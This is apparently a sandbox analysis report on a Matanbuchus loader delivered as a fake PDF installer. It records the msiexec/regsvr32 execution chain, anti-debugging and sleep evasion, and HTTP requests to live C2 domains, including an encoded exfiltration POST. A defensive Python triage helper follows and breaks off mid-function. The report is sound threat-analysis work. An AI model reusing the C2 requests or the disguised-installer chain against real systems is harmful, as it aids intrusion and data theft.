Windows Analysis Report
SCAN-068589.pdf.msi

Overview

General Information

Sample Name: SCAN-068589.pdf.msi
Analysis ID: 647225
MD5: c0ee31bc6536ae8cb7e5d8809676920a
SHA1: b21482d1072e5cb65488f2c181f38c75d8c80dcd
SHA256: 2d8740ea16e9457a358ebea73ad377ff75f7aa9bdf748f0d801f5a261977eda4
Tags: msi

Detection

Matanbuchus
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Matanbuchus
System process connects to network (likely due to code injection or exploit)
Uses known network protocols on non-standard ports
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
Adds / modifies Windows certificates
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
PE / OLE file has an invalid certificate
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Creates or modifies windows services
Dropped file seen in connection with other malware
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Source: unknown HTTPS traffic detected: 213.226.114.15:443 -> 192.168.2.22:49180 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\Windows\SysWOW64\regsvr32.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E462F53 FindFirstFileExW, 12_2_6E462F53

Networking

Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: collectiontelemetrysystem.com
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 213.226.114.15 48195
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: telemetrysystemcollection.com
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 49185 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49185
Source: unknown Network traffic detected: HTTP traffic on port 49186 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49186
Source: unknown Network traffic detected: HTTP traffic on port 49187 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49187
Source: unknown Network traffic detected: HTTP traffic on port 49188 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49188
Source: unknown Network traffic detected: HTTP traffic on port 49189 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49189
Source: unknown Network traffic detected: HTTP traffic on port 49190 -> 48195
Source: unknown Network traffic detected: HTTP traffic on port 48195 -> 49190
Source: Joe Sandbox View ASN Name: RETN-ASEU RETN-ASEU
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic HTTP traffic detected: GET /m8YYdu/mCQ2U9/auth.aspx HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: telemetrysystemcollection.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /m8YYdu/mCQ2U9/home.aspx HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: telemetrysystemcollection.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 563 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Ascii: ev=
Source: global traffic HTTP traffic detected: POST /cAUtfkUDaptk/ZRSeiy/requets/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.5197; ms-office; MSOffice 16) Host: collectiontelemetrysystem.com Content-Length: 231 Content-Type: application/x-www-form-urlencoded Accept-Language: en-RUS Data Ascii: ev=eyIzbTd4IjoiMnhDWkdMaz0iLCJKYiI6IjdBU1JBZz09IiwiTlNleURYIjoiMUNlUkNKT3oiLCJWeiI6IjJVNm9KcjZGbWdMQTh2Q1IveHFxZ0M4OUhDS2YvSkxETEtFSUswcHdpdWs9IiwiYk4iOiJ6QWM9IiwiY0JGIjoiM3pmWk4rUEd2QythdzVudnYxalEram89Iiwid1A2IjoiN0VYYVJmbmIifQ==
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 213.226.114.15:48195
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: regsvr32.exe String found in binary or memory: http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx
Source: regsvr32.exe String found in binary or memory: http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx
Source: regsvr32.exe String found in binary or memory: https://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/auth.aspx
Source: regsvr32.exe String found in binary or memory: https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx
Source: regsvr32.exe String found in binary or memory: https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx
Source: unknown DNS traffic detected: queries for: telemetrysystemcollection.com
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\68bd58.ipi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\68bd57.msi
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E465E60 12_2_6E465E60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E458C50 12_2_6E458C50
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45FDC5 12_2_6E45FDC5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4585F0 12_2_6E4585F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4662FA 12_2_6E4662FA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45E2BD 12_2_6E45E2BD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4690BC 12_2_6E4690BC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4691DC 12_2_6E4691DC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 6E45ADD0 appears 35 times
Source: C:\Windows\System32\msiexec.exe Process Stats: CPU usage > 98%
Source: SCAN-068589.pdf.msi Static PE information: invalid certificate
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\x86\5507.nls F8CC2CF36E193774F13C9C5F23AB777496DCD7CA588F4F73B45A7A5FFA96145E
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\System32\msiexec.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\SCAN-068589.pdf.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {4CFB7DD2-D1A8-412D-8316-3EFD3FFEBE4B} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeFontPack
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\~DF6CBE8E5B62F6E221.TMP
Source: classification engine Classification label: mal64.troj.evad.winMSI@13/12@9/1
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation

Source: Yara match File source: 12.2.regsvr32.exe.6e410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\AdobeFontPack\main.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\x86\5507.nls, type: DROPPED
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Users\user\AppData\Local\x86\5507.nls
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeFontPack\main.dll
Source: C:\Windows\System32\msiexec.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\SystemRestore
Source: C:\Windows\System32\msiexec.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\VssapiPublisher

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\msiexec.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Windows\System32\msiexec.exe TID: 568 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2104 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2716 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2384 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1056 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E462F53 FindFirstFileExW, 12_2_6E462F53
Source: C:\Windows\SysWOW64\regsvr32.exe Thread delayed: delay time: 80000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: regsvr32.exe, 00000007.00000003.1133918738.0000000003CE0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1146769824.0000000003849000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1115719703.00000000036E1000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1145675785.0000000003DB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1138782009.0000000003DA0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: zyjF6yeosi3Z3BbszxHZ5k7PONzRIIxJBPMbNo3u0Vg2zQeMu4Rk8CfGv3TUFN4O
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45D490 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6E45D490
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E463FE0 GetProcessHeap, 12_2_6E463FE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E457CAA mov eax, dword ptr fs:[00000030h] 12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E457CAA mov ecx, dword ptr fs:[00000030h] 12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E457CAA mov ecx, dword ptr fs:[00000030h] 12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E457CAA mov ecx, dword ptr fs:[00000030h] 12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E416570 mov ecx, dword ptr fs:[00000030h] 12_2_6E416570
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov ecx, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov eax, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41DF70 mov edx, dword ptr fs:[00000030h] 12_2_6E41DF70
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45EFD5 mov eax, dword ptr fs:[00000030h] 12_2_6E45EFD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E458C50 mov eax, dword ptr fs:[00000030h] 12_2_6E458C50
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E458C50 mov ecx, dword ptr fs:[00000030h] 12_2_6E458C50
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41ECD0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41ECD0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41ECD0 mov eax, dword ptr fs:[00000030h] 12_2_6E41ECD0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41ECD0 mov eax, dword ptr fs:[00000030h] 12_2_6E41ECD0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov eax, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E415580 mov edx, dword ptr fs:[00000030h] 12_2_6E415580
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov edx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov edx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov ecx, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41AAC0 mov eax, dword ptr fs:[00000030h] 12_2_6E41AAC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E462B7D mov eax, dword ptr fs:[00000030h] 12_2_6E462B7D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov eax, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov eax, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov ecx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E418300 mov edx, dword ptr fs:[00000030h] 12_2_6E418300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E411300 mov eax, dword ptr fs:[00000030h] 12_2_6E411300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E411300 mov ecx, dword ptr fs:[00000030h] 12_2_6E411300
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E420BEE mov edx, dword ptr fs:[00000030h] 12_2_6E420BEE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41A390 mov eax, dword ptr fs:[00000030h] 12_2_6E41A390
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41E160 mov ecx, dword ptr fs:[00000030h] 12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41E160 mov eax, dword ptr fs:[00000030h] 12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41E160 mov edx, dword ptr fs:[00000030h] 12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E41E160 mov eax, dword ptr fs:[00000030h] 12_2_6E41E160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E421160 mov eax, dword ptr fs:[00000030h] 12_2_6E421160
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E419910 mov ecx, dword ptr fs:[00000030h] 12_2_6E419910
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E419910 mov eax, dword ptr fs:[00000030h] 12_2_6E419910
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E419910 mov eax, dword ptr fs:[00000030h] 12_2_6E419910
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4589F0 mov ecx, dword ptr fs:[00000030h] 12_2_6E4589F0
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45AF5D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_6E45AF5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45D490 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6E45D490
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45ACAD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6E45ACAD
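A triage helper for the block of evasion signatures above, added here as an example in Python and not part of the sandbox report or the sample: it parses the "Thread sleep time", "Evasive API call chain" and "Code function" lines in the exact shape the report prints them (an assumption for any other report version), totals the requested sleep per process against the threshold the report itself states (values are treated as magnitudes in the report's own unit), and maps the disassembly fragments to the anti-analysis technique they indicate. `fs:[00000030h]` is the PEB pointer slot in the 32-bit TEB, which is where BeingDebugged, NtGlobalFlag and the ProcessHeap pointer are read without ever calling IsDebuggerPresent, so those `mov` lines are a debugger/sandbox check even though no API name appears in them.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the signature lines from the report section above, copied verbatim.
REPORT_LINES = r"""
Source: C:\Windows\System32\msiexec.exe TID: 568 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2104 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2716 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2384 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1056 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45D490 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6E45D490
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E463FE0 GetProcessHeap, 12_2_6E463FE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E457CAA mov eax, dword ptr fs:[00000030h] 12_2_6E457CAA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E4168E0 mov ecx, dword ptr fs:[00000030h] 12_2_6E4168E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45AACC cpuid 12_2_6E45AACC
"""

REGSVR32 = r"C:\Windows\SysWOW64\regsvr32.exe"
MSIEXEC = r"C:\Windows\System32\msiexec.exe"

# Line shapes follow the report's own formatting; other report versions may differ (assumption).
SLEEP_RE = re.compile(r"^Source: (?P<proc>\S+) TID: (?P<tid>\d+) Thread sleep time: -(?P<val>\d+)s >= -(?P<thr>\d+)s")
CHAIN_RE = re.compile(r"^Source: (?P<proc>\S+) Evasive API call chain: (?P<chain>.+)$")
FUNC_RE = re.compile(r"^Source: (?P<proc>\S+) Code function: (?P<addr>\S+) (?P<body>.+?) (?P=addr)$")

# What each API name or disassembly fragment in a "Code function" line tells the analyst.
TECHNIQUES = {
    "IsDebuggerPresent": "debugger check (IsDebuggerPresent)",
    "fs:[00000030h]": "direct PEB read (fs:[30h])",
    "GetProcessHeap": "heap flags check (GetProcessHeap)",
    "cpuid": "CPU fingerprinting (cpuid)",
}


def parse_report(lines):
    """Split the report into per-process sleep calls, evasive call chains and technique hits."""
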